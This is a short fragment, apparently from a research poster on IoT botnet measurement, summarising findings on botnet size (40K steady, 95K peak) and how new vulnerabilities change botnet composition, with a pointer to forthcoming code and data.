Code and data coming soon: iot.cs.umd.edu
Key scans
New vulnerabilities can lead todrastic changes in size, geography, and composition
IoT botnets areresilient and large 40K steady 95K peak